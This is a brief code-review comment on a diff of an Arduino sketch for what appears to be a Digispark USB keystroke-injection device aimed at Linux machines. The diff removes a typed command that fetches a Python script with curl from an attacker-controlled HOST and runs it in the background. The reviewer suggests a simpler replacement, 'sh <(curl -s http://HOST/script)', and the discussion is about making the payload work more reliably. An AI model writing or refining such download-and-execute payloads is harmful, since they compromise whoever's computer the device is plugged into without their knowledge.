hidswitch.ino

```diff
@@ -131,7 +131,7 @@ void linux_keyboard()
 
     DigiKeyboard.delay(300);
 
-    DigiKeyboard.println("nohup (python <(curl -s http://"HOST"/python.py))& exit");
```

Comment:
It's still got a | character :(
how about just `sh <(curl -s http://"HOST"/script)`
everyone has curl right?